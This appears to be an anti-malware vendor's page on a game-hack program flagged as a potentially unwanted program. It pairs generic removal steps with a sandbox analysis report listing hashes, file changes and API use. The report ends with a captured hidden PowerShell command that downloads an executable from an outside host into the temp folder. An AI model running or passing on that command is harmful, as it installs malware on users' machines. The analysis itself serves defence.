PUP.Gamehack.GDDE

The detection of PUP.Gamehack.GDDE on your system indicates the presence of a potentially unwanted program (PUP) that may be causing issues with your computer's performance and security. It's essential to understand the nature of this threat and take appropriate steps to remove it and prevent future infections.

What Is PUP.Gamehack.GDDE?

PUP.Gamehack.GDDE is a type of malware that is classified as a potentially unwanted program. This means that it may not be as malicious as other types of malware, such as viruses or Trojans, but it can still cause problems with your system and compromise your personal data. PUPs are often installed unintentionally, and they can be difficult to remove without the right tools and knowledge.

How PUP.Gamehack.GDDE Operates

PUP.Gamehack.GDDE, like other PUPs, can operate in various ways, depending on its design and purpose. It may be used to display unwanted advertisements, collect user data, or install additional malware on the infected system. In some cases, PUPs can also be used to hijack browser settings, redirect users to suspicious websites, or slow down system performance. The exact behavior of PUP.Gamehack.GDDE can vary, but its primary goal is to generate revenue for its creators or compromise user data.

Symptoms of Infection

If your system is infected with PUP.Gamehack.GDDE, you may notice various symptoms, including unwanted pop-ups, slow system performance, and suspicious browser behavior. You may also notice that your browser settings have been changed, or that you are being redirected to unfamiliar websites. In some cases, PUPs can also cause system crashes, freezes, or errors. If you suspect that your system is infected with PUP.Gamehack.GDDE, it's essential to take immediate action to remove the threat and prevent further damage.

  • Unwanted pop-ups and advertisements
  • Slow system performance
  • Suspicious browser behavior
  • Changed browser settings
  • System crashes, freezes, or errors

How to Remove PUP.Gamehack.GDDE

  1. Boot your system in Safe Mode with Networking to prevent the PUP from loading and to allow for a more effective removal process.
  2. Use a reputable anti-malware tool, such as SpyHunter, to perform a full scan of your system and detect any malware, including PUP.Gamehack.GDDE.
  3. Uninstall any suspicious programs or applications that may be related to the PUP.
  4. Reset your browser settings to their default values, including Chrome, Firefox, and Edge, to remove any changes made by the PUP.
  5. Reboot your system and perform another scan with your anti-malware tool to ensure that the PUP has been completely removed.

Conclusion

Removing PUP.Gamehack.GDDE from your system requires careful attention to detail and the use of reputable anti-malware tools. By following the steps outlined above, you can effectively remove the PUP and prevent future infections. It's also essential to practice good cybersecurity habits, such as regularly updating your operating system and software, using strong passwords, and avoiding suspicious downloads and websites. By taking these precautions, you can help protect your system and personal data from PUPs and other types of malware.

Analysis Report

General information

Family Name: PUP.Gamehack.GDDE
Signature status: No Signature

Known Samples

MD5: 58cd77dfe7059c248306b9613153b9ba
SHA1: 2ba067a7868f588b8dcada50a333983be8b887ee
SHA256: A2DDC1F3D33887A88AA0D41BE31052C5C46C93C8E7F0B21AA51576F4FDDB01C9
File Size: 881.66 KB, 881664 bytes
MD5: 53de914592e4b67f695ed5f3c36e0db2
SHA1: 755599d4b3a72ad5508fedffd22b9d75e2f7bfbe
SHA256: 39C4308337FD0A3685DD62A26ACD4FB6F1651C03C11F7F2BF185DBDD2B99CF95
File Size: 639.49 KB, 639488 bytes
MD5: 2915cbf68ae888616655e6df575c5968
SHA1: a860a4544dcdedc8e0da5665236f29444d8d429f
SHA256: 413E4FB4C226B21B3993A0B40297B8ACC385D5540471593296252F5AA7AC8558
File Size: 708.10 KB, 708096 bytes
MD5: 4e179ca46f07f7ac2544c23a5d42c43c
SHA1: a97373faf91a1a46695e70d1fb4040f2fda86d41
SHA256: E8C456F8B129EB238F212B5DE4E512069994D7741651C29FC497EE0859275A53
File Size: 861.70 KB, 861696 bytes
MD5: e61180ee387dc0d6659b9b142084a4c1
SHA1: f5f80a17fb119a080a8474f229bdd86dac87ede6
SHA256: 606EE91B0BA02848AF540CF41220FC2E60D906B354A5D044C18ACC2194D7E778
File Size: 973.82 KB, 973824 bytes
Show More
MD5: ebfb0900f49a9c6770932c9e2158bc41
SHA1: c554422a7af2b695b20e5d3817069666b55fe60a
SHA256: 213E22CBED0708922F35391C9E0C87819A8ABA7B97416EC0682FD2C5DF50A264
File Size: 876.03 KB, 876032 bytes
MD5: 7818ccb44a653f5bfe6d72a93a961a74
SHA1: 04840630ebe7f978c1f05887833acfd3fa01d3ad
SHA256: 6B6E23D77CBB941BA30DB13A1ED71824C5548195C638554715260C59BFCE6A46
File Size: 547.33 KB, 547328 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • 2+ executable sections
  • dll
  • HighEntropy
  • imgui
  • No Version Info
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 457
Potentially Malicious Blocks: 67
Whitelisted Blocks: 354
Unknown Blocks: 36

Visual Map

x 0 0 0 0 0 0 x x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 x x ? 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 ? ? 0 0 x 0 0 0 0 0 0 x 0 0 1 x 1 0 0 0 0 0 0 x 0 0 x 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 x 0 0 x 0 0 0 0 0 ? 0 x 0 0 x x 0 x 0 x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 x 0 0 x 0 0 0 x x 0 0 0 0 0 x 0 x x 0 x x 0 0 x 0 0 0 x 0 0 x 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x x 0 0 ? x x x 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x x x x 0 0 0 0 0 x 0 0 x 0 0 x 0 x 0 0 0 x 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 x x x 0 x 0 x 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 x x 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 ? ? 0 ? ? 0 ? ? ? ? ? ? 0 0 0 ? 0 0 ? ? ? ? ? ? ? 0 ? 0 0 0 0 0 0 0 x 1 ? ? ? ? 0 ? 2 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • Gamehack.LCXA
  • Kryptik.ODFF
  • RobloxHack.LE

Files Modified

File Attributes
\device\namedpipe\pshost.134221426482759538.7492.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\temp\__psscriptpolicytest_kzwaiyx4.5lp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_qzfuq4ei.2ex.psm1 Generic Write,Read Attributes
c:\uwuware\assets\font.ttf Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ����� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe S����� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe �B��� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe �B��� RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAllocateReserveObject
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSecurityContext
Show More
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRemoveIoCompletionEx
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject

35 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges
Network Wininet
  • InternetOpen
  • InternetOpenUrl

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe